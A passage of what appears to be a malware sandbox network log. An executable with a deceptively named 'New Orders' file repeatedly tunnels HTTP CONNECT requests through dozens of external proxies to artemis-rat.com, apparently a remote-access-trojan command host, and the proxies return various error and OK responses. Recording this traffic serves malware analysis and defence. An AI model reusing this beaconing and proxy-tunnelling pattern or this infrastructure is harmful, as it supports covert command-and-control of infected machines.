                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        880192.168.2.952694172.67.253.69807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.169162035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.323780060 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        881192.168.2.95269174.48.7.43807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.169167995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        882192.168.2.95260714.103.26.5380007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.170583963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        883192.168.2.952597185.217.143.23807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.170969963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        884192.168.2.95263898.170.57.24941457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.171013117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        885192.168.2.95263034.176.113.14831287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.171343088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.824001074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.726366997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.439476967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.945278883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.444533110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        886192.168.2.95260837.235.48.19807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.174097061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        887192.168.2.95260627.0.234.20610807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.174097061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        888192.168.2.95261135.79.120.24231287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.174280882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.441591024 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        889192.168.2.95163892.204.134.3815557672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.182626963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.242142916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.242786884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.242402077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        890192.168.2.95265434.64.4.27807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.183690071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.583199978 CET1286INHTTP/1.1 405 Method Not Allowed
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Referrer-Policy: no-referrer
                                                                                        Content-Length: 1592
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Connection: close
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 20 28 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20
                                                                                        Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 405 (Method Not Allowed)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen
                                                                                        Mar 11, 2024 16:16:43.583250999 CET489INData Raw: 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65
                                                                                        Data Ascii: and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </styl


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        891192.168.2.952598103.200.135.22941457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.183943987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        892192.168.2.95266723.137.248.19788887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.185633898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.478492022 CET309INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Mon, 11 Mar 2024 15:16:43 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 157
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        893192.168.2.950210159.192.102.24980807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.193291903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.273374081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.367656946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.215890884 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        894192.168.2.95017583.151.4.172470367672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.201682091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        895192.168.2.952646170.64.206.11480007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.201684952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        896192.168.2.952621188.215.245.235807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.204413891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.960767031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.961985111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.976912022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.976635933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.958014011 CET536INHTTP/1.1 500 Internal Server Error
                                                                                        Date: Mon, 11 Mar 2024 15:16:55 GMT
                                                                                        Server: Apache/2.4.38 (Debian)
                                                                                        Content-Length: 614
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of
                                                                                        Mar 11, 2024 16:16:54.958022118 CET270INData Raw: 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72
                                                                                        Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.38 (Debian) Server at artemis-rat.com Port 44


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        897192.168.2.950239154.65.39.7807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:43.205323935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.935424089 CET536INHTTP/1.1 500 Internal Server Error
                                                                                        Date: Mon, 11 Mar 2024 12:18:05 GMT
                                                                                        Server: Apache/2.4.38 (Debian)
                                                                                        Content-Length: 613
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
